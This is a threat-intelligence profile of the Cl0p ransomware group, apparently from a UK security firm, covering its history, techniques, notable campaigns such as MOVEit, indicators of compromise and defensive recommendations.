Threat Groups

Cl0p

1. Overview

Cl0p is a high-impact ransomware group operating under a double extortion model, best known for its targeted exploitation of enterprise file transfer systems and public data leaks involving some of the world’s largest organisations. Active since at least 2019, Cl0p (also styled as Clop) operates a sophisticated, financially motivated operation that combines custom ransomware tooling, advanced vulnerability exploitation, and a well-maintained leak portal.

The group gained international notoriety in 2021 for its exploitation of Accellion FTA, and again in 2023 with its mass exploitation of MOVEit Transfer—a supply chain-level incident affecting hundreds of global enterprises. Cl0p has specifically targeted firms in finance, legal, healthcare, energy, education, and government sectors, with multiple victims based in the UK and Europe.

2. Origin and Evolution

Cl0p is believed to be operated by FIN11, a financially motivated cybercrime group linked to Eastern Europe. The group first emerged as a variant of the CryptoMix ransomware family before evolving into an autonomous toolset, complete with custom encryptors, C2 infrastructure, and automated exfiltration capabilities.

Unlike traditional Ransomware-as-a-Service (RaaS) groups, Cl0p appears to operate as a closed group, maintaining tight control over its campaigns and infrastructure. Over time, Cl0p has shifted its focus away from encryption-only operations to data-centric extortion, in some cases skipping encryption entirely and relying solely on the threat of data exposure.

3. Tactics, Techniques, and Procedures (TTPs)

Cl0p employs a highly targeted approach to intrusion, with a focus on exploiting known vulnerabilities in enterprise-grade software. Their tactics include:

  • Initial Access:
    Exploitation of zero-day vulnerabilities in managed file transfer platforms such as MOVEit (T1190), GoAnywhere, and Accellion FTA. Occasionally uses phishing (T1566.001) and credential abuse (T1078).
  • Lateral Movement:
    Use of PsExec, RDP, and PowerShell for internal traversal (T1021), with a focus on quickly identifying backup servers and domain controllers.
  • Data Exfiltration:
    Exfiltration via Rclone, MEGA.nz, and custom scripts that automate archive creation and staging for transfer (T1041). Data is carefully selected for reputational impact.
  • Encryption (when used):
    Custom Cl0p payloads apply AES encryption and rename files with .clop or .CLOP extensions. The group sometimes opts not to encrypt and solely demands ransom for withheld data.
  • Persistence & Evasion:
    Uses registry edits (T1112), disables antivirus, clears logs, and leverages LOLBins to avoid triggering behavioural analytics (T1036).

4. Targeting Profile

Cl0p focuses almost exclusively on large enterprises, particularly those with:

  • Regulatory exposure (e.g., GDPR, HIPAA)
  • High-value client or customer datasets
  • Weak segmentation between user-facing services and internal data repositories

Frequent targets include:

  • Financial institutions
  • Legal and accounting firms
  • Universities and colleges
  • Retail and manufacturing supply chains
  • UK local councils and NHS contractors

Organisations in the UK, Germany, United States, and Australia have featured prominently on Cl0p’s leak site.

5. Notable Campaigns and Victims

Cl0p has been responsible for some of the largest data extortion events on record. Notable incidents include:

  • MOVEit Transfer Exploitation (2023):
    A mass attack exploiting a zero-day vulnerability in Progress Software’s MOVEit platform. Victims included Shell, British Airways, BBC, and Zellis, affecting payroll and HR data across the UK.
  • Accellion FTA Campaign (2021):
    Exploited a vulnerability in the legacy Accellion file transfer appliance, affecting Trinity Health, Bombardier, and Stanford University.
  • South Korean Retail Breach (2020):
    Targeted multiple large corporations, exfiltrating and leaking sensitive financial and HR data.

Cl0p typically publishes victims on its “CL0P^_- LEAKS” dark web portal, complete with branding, sample data, and countdowns to full release.

6. Ransomware and Leak Site Behaviour

Cl0p’s leak site is a central tool in their extortion playbook, offering:

  1. Branded listings of victims, often with logos and sector information
  2. Data previews to prove authenticity
  3. TOR-based portals for negotiation
  4. Public countdowns to data release

The group’s communications are professional but coercive, frequently citing the legal and reputational consequences of non-payment. Ransom demands have ranged from £250,000 to £15 million, with larger demands reserved for multinational organisations.

7. Technical Indicators

Common indicators of Cl0p ransomware activity include:

  • File extensions: .clop, .CLOP, or .CLOP_README.txt
  • Known exploit chains tied to MOVEit, Accellion, and GoAnywhere
  • Use of rclone.exe, 7z.exe, and MEGA links for data exfiltration
  • PowerShell scripts executed via WMI
  • Deployment from admin shares using PsExec

Updated IOCs and detection signatures are maintained by UK Cyber Defence Ltd.

8. Defensive Measures and Recommendations

To defend against Cl0p ransomware:

  • Patch managed file transfer software (MOVEit, GoAnywhere, Accellion) immediately
  • Enforce multi-factor authentication for all external-facing services
  • Monitor for Rclone, PowerShell, and archive creation at scale
  • Implement network segmentation, particularly isolating file transfer environments
  • Maintain immutable backups, stored offline and tested quarterly
  • Subscribe to threat intelligence feeds for early warning of exploited vulnerabilities

9. Attribution and Alliances

Cl0p is widely believed to be operated by FIN11, a financially motivated cybercriminal group with links to Russian-speaking underground forums. The group does not operate as a public affiliate programme, but may collaborate with initial access brokers and malware-as-a-service providers.

Despite law enforcement takedowns of its infrastructure in 2021, Cl0p has rebuilt and remained active—indicating a resilient and decentralised operational model.

10. Conclusion

Cl0p is one of the most dangerous and strategically agile ransomware groups currently operating. Its ability to exploit enterprise software vulnerabilities at scale, bypass traditional defences, and pressure victims through high-profile data leaks makes it a priority threat for UK organisations, particularly those in finance, legal, education, and supply chain sectors.

Proactive defence, visibility into data flows, and readiness to respond to data theft—not just encryption—are essential to mitigating Cl0p’s impact.

Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025

  • 44 Views

you may also like

Kettering Health crippled by ransomware: 14 hospitals on emergency reroute

On May 20, 2025, Kettering Health’s network was hit by a ransomware attack, forcing 14 hospitals to switch to emergency reroutes and manual operations. The attack spread rapidly across critical systems due to undetected lateral movement, highlighting gaps in early threat detection. Patients reported suspicious calls, indicating potential data misuse. This incident underscores the urgent need for healthcare organizations to strengthen identity security, implement layered defenses, and prepare robust response plans.

Pro-Russian Cyber Activity: Hybrid Threats and the UK Response

An insights article assessing pro-Russian cyber activity with a situational briefing on hybrid threats to UK-aligned institutions. Includes a side-by-side comparison of key threat groups including KillNet, NoName057(16), and XakNet.

Donation-Based Ransomware Groups

An insights article comparing donation-model ransomware operators such as MalasLocker, exploring the ethics, tactics, and implications of threat actors who demand charitable giving instead of cryptocurrency payments.

Western Alliance Data Breach Tied to Cleo Software Flaw

Western Alliance Bank confirmed a data breach in April 2025 linked to a vulnerability in Cleo Integration Cloud. The breach, attributed to the Cl0p ransomware group, underscores the growing risks from third-party software vulnerabilities. Learn how the bank is responding and the increasing role of SOC in protecting financial institutions.

DBS Data Breach 2025: Ransomware Attack Exposes 11,000 Customers

An insights article examining the 2025 DBS data breach, focusing on how a ransomware attack on vendor Toppan Next Tech exposed thousands of customer records, and what it reveals about the growing threat of third-party supply chain vulnerabilities in the financial sector.

Emerging Ransomware Threats and Securing Open-Source Email Infrastructure

An insights article highlighting the rise of unconventional ransomware groups targeting open-source email platforms like Zimbra, including a technical bulletin with actionable guidance for UK organisations.

Stay Informed. Stay Secure.

Subscribe to our newsletter.
Linkedin-in
© 2025 CyberDefence